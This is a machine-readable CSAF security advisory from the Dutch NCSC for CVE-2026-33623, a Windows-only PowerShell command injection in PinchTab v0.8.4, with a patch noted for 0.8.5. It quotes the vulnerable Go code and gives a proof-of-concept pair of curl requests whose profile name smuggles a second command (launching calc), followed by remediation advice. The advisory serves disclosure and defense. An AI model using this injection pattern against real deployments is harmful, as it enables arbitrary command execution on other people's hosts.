{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33623", "tracking": { "current_release_date": "2026-03-31T16:25:39.275754Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33623", "initial_release_date": "2026-03-24T20:55:24.104423Z", "revision_history": [ { "date": "2026-03-24T20:55:24.104423Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-24T20:55:27.979639Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-25T18:12:47.772258Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-25T18:12:49.748357Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-26T21:27:27.329535Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-26T21:27:33.117139Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-26T21:38:42.362282Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-26T21:38:50.074493Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-27T00:14:03.596154Z", "number": "9", "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (2)." }, { "date": "2026-03-27T20:56:40.290234Z", "number": "10", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-27T20:56:43.724523Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-27T21:26:35.402093Z", "number": "12", "summary": "Unknown change." }, { "date": "2026-03-28T07:57:43.896701Z", "number": "13", "summary": "References created (1)." }, { "date": "2026-03-31T16:25:00.739744Z", "number": "14", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-31T16:25:06.889773Z", "number": "15", "summary": "NCSC Score updated." } ], "status": "interim", "version": "15" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<0.8.5", "product": { "name": "vers:unknown/<0.8.5", "product_id": "CSAFPID-5919278", "product_identification_helper": { "cpe": "cpe:2.3:a:pinchtab:pinchtab:*:*:*:*:*:*:*:*" } } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<0.8.5", "product": { "name": "vers:unknown/>=0|<0.8.5", "product_id": "CSAFPID-5907190" } } ], "category": "product_name", "name": "pinchtab" } ], "category": "vendor", "name": "pinchtab" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33623", "cwe": { "id": "CWE-78", "name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')" }, "notes": [ { "category": "description", "text": "### Summary\nPinchTab `v0.8.4` contains a Windows-only command injection issue in the orphaned Chrome cleanup path. When an instance is stopped, the Windows cleanup routine builds a PowerShell `-Command` string using a `needle` derived from the profile path. In `v0.8.4`, that string interpolation escapes backslashes but does not safely neutralize other PowerShell metacharacters.\n\nIf an attacker can launch an instance using a crafted profile name and then trigger the cleanup path, they may be able to execute arbitrary PowerShell commands on the Windows host in the security context of the PinchTab process user.\n\nThis is not an unauthenticated internet RCE. It requires authenticated, administrative-equivalent API access to instance lifecycle endpoints, and the resulting command execution inherits the permissions of the PinchTab OS user rather than bypassing host privilege boundaries.\n\n### Details\n**Issue 1 — PowerShell command string built with interpolated user-influenced data (`internal/bridge/cleanup_windows.go` in `v0.8.4`):**\n\n```\nfunc findPIDsByPowerShell(needle string) []int {\n escaped := strings.ReplaceAll(needle, `\\`, `\\\\`)\n cmd := exec.Command(\"powershell\", \"-NoProfile\", \"-Command\",\n fmt.Sprintf(`Get-CimInstance Win32_Process -Filter \"Name='chrome.exe'\" | `+\n `Where-Object { $_.CommandLine -like '*%s*' } | `+\n `Select-Object -ExpandProperty ProcessId`, escaped))\n}\n```\n\nThe `needle` value is interpolated directly into a PowerShell command string. Escaping backslashes alone is not sufficient to make arbitrary user-controlled content safe inside a PowerShell expression.\n\n**Issue 2 — `needle` is derived from launchable profile names:**\n\nThe cleanup path uses:\n\n```\nfindPIDsByPowerShell(fmt.Sprintf(\"--user-data-dir=%s\", profileDir))\n```\n\nThe profile directory is derived from the instance/profile name used during launch. In `v0.8.4`, profile name validation rejected path traversal characters such as `/`, `\\`, and `..`, but it did not comprehensively block PowerShell metacharacters such as single quotes or statement separators.\n\n**Issue 3 — Trigger path is reachable through normal instance lifecycle APIs:**\n\nThe attack path described in the report uses:\n\n1. `POST /instances/launch` with a crafted `name`\n2. `POST /instances/{id}/stop` to trigger the cleanup routine\n\nThat means exploitability depends on access to privileged orchestration endpoints, not on local shell access.\n\n### PoC\n**Environment assumptions**\n\n- PinchTab `v0.8.4`\n- Windows host\n- Valid API token with access to instance lifecycle endpoints\n\n**Example sequence**\n\n```bash\ncurl -X POST http://HOST:9867/instances/launch \\\n -H \"Authorization: Bearer \" \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"name\": \"poc'\\''; Start-Process calc; $x='\\''\",\n \"mode\": \"headless\"\n }'\n```\n\nThen:\n\n```bash\ncurl -X POST http://HOST:9867/instances//stop \\\n -H \"Authorization: Bearer \"\n```\n\nIf the payload survives the launch path and reaches the vulnerable cleanup code, the injected PowerShell executes when the Windows cleanup routine runs.\n\n### Impact\n1. Arbitrary PowerShell command execution on Windows as the PinchTab process user.\n2. Full compromise of data and processes accessible to that user account.\n3. Possible persistence or host-level follow-on actions within the same user security context.\n4. Potential repeated execution in restart-heavy environments if the vulnerable cleanup path is triggered repeatedly.\n\n### Scope And Limits\n1. Windows only.\n2. Requires authenticated, administrative-equivalent API access to instance lifecycle endpoints.\n3. Does not by itself elevate beyond the privileges of the Windows user running PinchTab.\n4. This is stronger than a policy bypass or low-risk hardening gap, but narrower than unauthenticated remote code execution.\n\n### Suggested Remediation\n1. Do not interpolate user-influenced values into PowerShell `-Command` strings.\n2. Pass search terms through environment variables or structured arguments instead of code generation.\n3. Keep strict validation on profile names, but do not rely on input validation alone as the primary defense.\n4. Add regression tests covering PowerShell metacharacters in profile-derived values on Windows.\n\n\n\n\n### **Steps to Reproduce:**\n\n**Environment Setup:**\nTarget: PinchTab v0.8.4 (Windows build)\nPlatform: Windows only\n\n**1. Launch Instance with Malicious Profile Name**\n\n```\ncurl -X POST http://[server-ip]:9867/instances/launch \\\n -H \"Authorization: Bearer \" \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"name\": \"poc'\\''; Start-Process calc; $x='\\''\",\n \"mode\": \"headless\"\n }'\n```\n\n**2. Stop Instance to Trigger Injection**\n\n```\ncurl -X POST http://[server-ip]:9867/instances//stop \\\n -H \"Authorization: Bearer \"\n```\n\n### **Additional Observation — Repeated Execution (DoS Amplification)**\n\n**In environments where instances are automatically restarted (e.g., always-on mode), the cleanup routine is triggered repeatedly.**\n\nBecause the injection occurs during cleanup, the payload is executed on every restart cycle:\nContinuous spawning of calc.exe processes\nResource exhaustion\nSystem instability or crash\n\n### **Impact**\n\nThis vulnerability allows an authenticated attacker to execute arbitrary PowerShell commands on the Windows host running PinchTab. Impact - full host compromise including command execution, persistence, and data access; Root Cause - user-controlled input (profile name) is embedded into a PowerShell command without proper neutralization of special characters; Remediation - avoid constructing shell commands using string interpolation, enforce strict input validation (allowlist), and use structured command execution instead of powershell -Command.\n\nAdditionally, because the injection is triggered during the cleanup routine, environments with automatic instance restart behavior may repeatedly execute the injected payload, leading to uncontrolled process creation and resource exhaustion. This enables a reliable denial-of-service condition in addition to remote code execution.", "title": "github - https://api.github.com/advisories/GHSA-p8mm-644p-phmh" }, { "category": "description", "text": "### Summary\nPinchTab `v0.8.4` contains a Windows-only command injection issue in the orphaned Chrome cleanup path. When an instance is stopped, the Windows cleanup routine builds a PowerShell `-Command` string using a `needle` derived from the profile path. In `v0.8.4`, that string interpolation escapes backslashes but does not safely neutralize other PowerShell metacharacters.\n\nIf an attacker can launch an instance using a crafted profile name and then trigger the cleanup path, they may be able to execute arbitrary PowerShell commands on the Windows host in the security context of the PinchTab process user.\n\nThis is not an unauthenticated internet RCE. It requires authenticated, administrative-equivalent API access to instance lifecycle endpoints, and the resulting command execution inherits the permissions of the PinchTab OS user rather than bypassing host privilege boundaries.\n\n### Details\n**Issue 1 — PowerShell command string built with interpolated user-influenced data (`internal/bridge/cleanup_windows.go` in `v0.8.4`):**\n\n```\nfunc findPIDsByPowerShell(needle string) []int {\n escaped := strings.ReplaceAll(needle, `\\`, `\\\\`)\n cmd := exec.Command(\"powershell\", \"-NoProfile\", \"-Command\",\n fmt.Sprintf(`Get-CimInstance Win32_Process -Filter \"Name='chrome.exe'\" | `+\n `Where-Object { $_.CommandLine -like '*%s*' } | `+\n `Select-Object -ExpandProperty ProcessId`, escaped))\n}\n```\n\nThe `needle` value is interpolated directly into a PowerShell command string. Escaping backslashes alone is not sufficient to make arbitrary user-controlled content safe inside a PowerShell expression.\n\n**Issue 2 — `needle` is derived from launchable profile names:**\n\nThe cleanup path uses:\n\n```\nfindPIDsByPowerShell(fmt.Sprintf(\"--user-data-dir=%s\", profileDir))\n```\n\nThe profile directory is derived from the instance/profile name used during launch. In `v0.8.4`, profile name validation rejected path traversal characters such as `/`, `\\`, and `..`, but it did not comprehensively block PowerShell metacharacters such as single quotes or statement separators.\n\n**Issue 3 — Trigger path is reachable through normal instance lifecycle APIs:**\n\nThe attack path described in the report uses:\n\n1. `POST /instances/launch` with a crafted `name`\n2. `POST /instances/{id}/stop` to trigger the cleanup routine\n\nThat means exploitability depends on access to privileged orchestration endpoints, not on local shell access.\n\n### PoC\n**Environment assumptions**\n\n- PinchTab `v0.8.4`\n- Windows host\n- Valid API token with access to instance lifecycle endpoints\n\n**Example sequence**\n\n```bash\ncurl -X POST http://HOST:9867/instances/launch \\\n -H \"Authorization: Bearer \" \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"name\": \"poc'\\''; Start-Process calc; $x='\\''\",\n \"mode\": \"headless\"\n }'\n```\n\nThen:\n\n```bash\ncurl -X POST http://HOST:9867/instances//stop \\\n -H \"Authorization: Bearer \"\n```\n\nIf the payload survives the launch path and reaches the vulnerable cleanup code, the injected PowerShell executes when the Windows cleanup routine runs.\n\n### Impact\n1. Arbitrary PowerShell command execution on Windows as the PinchTab process user.\n2. Full compromise of data and processes accessible to that user account.\n3. Possible persistence or host-level follow-on actions within the same user security context.\n4. Potential repeated execution in restart-heavy environments if the vulnerable cleanup path is triggered repeatedly.\n\n### Scope And Limits\n1. Windows only.\n2. Requires authenticated, administrative-equivalent API access to instance lifecycle endpoints.\n3. Does not by itself elevate beyond the privileges of the Windows user running PinchTab.\n4. This is stronger than a policy bypass or low-risk hardening gap, but narrower than unauthenticated remote code execution.\n\n### Suggested Remediation\n1. Do not interpolate user-influenced values into PowerShell `-Command` strings.\n2. Pass search terms through environment variables or structured arguments instead of code generation.\n3. Keep strict validation on profile names, but do not rely on input validation alone as the primary defense.\n4. Add regression tests covering PowerShell metacharacters in profile-derived values on Windows.\n\n\n\n\n### **Steps to Reproduce:**\n\n**Environment Setup:**\nTarget: PinchTab v0.8.4 (Windows build)\nPlatform: Windows only\n\n**1. Launch Instance with Malicious Profile Name**\n\n```\ncurl -X POST http://[server-ip]:9867/instances/launch \\\n -H \"Authorization: Bearer \" \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"name\": \"poc'\\''; Start-Process calc; $x='\\''\",\n \"mode\": \"headless\"\n }'\n```\n\n**2. Stop Instance to Trigger Injection**\n\n```\ncurl -X POST http://[server-ip]:9867/instances//stop \\\n -H \"Authorization: Bearer \"\n```\n\n### **Additional Observation — Repeated Execution (DoS Amplification)**\n\n**In environments where instances are automatically restarted (e.g., always-on mode), the cleanup routine is triggered repeatedly.**\n\nBecause the injection occurs during cleanup, the payload is executed on every restart cycle:\nContinuous spawning of calc.exe processes\nResource exhaustion\nSystem instability or crash\n\n### **Impact**\n\nThis vulnerability allows an authenticated attacker to execute arbitrary PowerShell commands on the Windows host running PinchTab. Impact - full host compromise including command execution, persistence, and data access; Root Cause - user-controlled input (profile name) is embedded into a PowerShell command without proper neutralization of special characters; Remediation - avoid constructing shell commands using string interpolation, enforce strict input validation (allowlist), and use structured command execution instead of powershell -Command.\n\nAdditionally, because the injection is triggered during the cleanup routine, environments with automatic instance restart behavior may repeatedly execute the injected payload, leading to uncontrolled process creation and resource exhaustion. This enables a reliable denial-of-service condition in addition to remote code execution.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-p8mm-644p-phmh.json?alt=media" }, { "category": "description", "text": "PinchTab: OS Command Injection via Profile Name in Windows Cleanup Routine Enables Arbitrary Command Execution in github.com/pinchtab/pinchtab", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4823.json?alt=media" }, { "category": "description", "text": "PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.4` contains a Windows-only command injection issue in the orphaned Chrome cleanup path. When an instance is stopped, the Windows cleanup routine builds a PowerShell `-Command` string using a `needle` derived from the profile path. In `v0.8.4`, that string interpolation escapes backslashes but does not safely neutralize other PowerShell metacharacters. If an attacker can launch an instance using a crafted profile name and then trigger the cleanup path, they may be able to execute arbitrary PowerShell commands on the Windows host in the security context of the PinchTab process user. This is not an unauthenticated internet RCE. It requires authenticated, administrative-equivalent API access to instance lifecycle endpoints, and the resulting command execution inherits the permissions of the PinchTab OS user rather than bypassing host privilege boundaries. Version 0.8.5 contains a patch for the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33623" }, { "category": "description", "text": "PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.4` contains a Windows-only command injection issue in the orphaned Chrome cleanup path. When an instance is stopped, the Windows cleanup routine builds a PowerShell `-Command` string using a `needle` derived from the profile path. In `v0.8.4`, that string interpolation escapes backslashes but does not safely neutralize other PowerShell metacharacters. If an attacker can launch an instance using a crafted profile name and then trigger the cleanup path, they may be able to execute arbitrary PowerShell commands on the Windows host in the security context of the PinchTab process user. This is not an unauthenticated internet RCE. It requires authenticated, administrative-equivalent API access to instance lifecycle endpoints, and the resulting command execution inherits the permissions of the PinchTab OS user rather than bypassing host privilege boundaries. Version 0.8.5 contains a patch for the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33623.json" }, { "category": "other", "text": "0.00128", "title": "EPSS" }, { "category": "other", "text": "3.7", "title": "NCSC Score" }, { "category": "other", "text": "There is exploit data available from source Nvd, The value of the most recent CVSS (V3) score, The value of the most recent EPSS score, Exploit code publicly available", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5907190", "CSAFPID-5919278" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-p8mm-644p-phmh" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-p8mm-644p-phmh.json?alt=media" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33623" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33623.json" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4823.json?alt=media" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-p8mm-644p-phmh" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/pinchtab/pinchtab/commit/25b3374bdcdf0dad32c44d5d726bf953238cd8bd" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-p8mm-644p-phmh" }, { "category": "external", "summary": "Reference - github", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33623" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L", "baseScore": 6.7, "baseSeverity": "MEDIUM" }, "products": [ "CSAFPID-5907190", "CSAFPID-5919278" ] } ], "title": "CVE-2026-33623" } ] }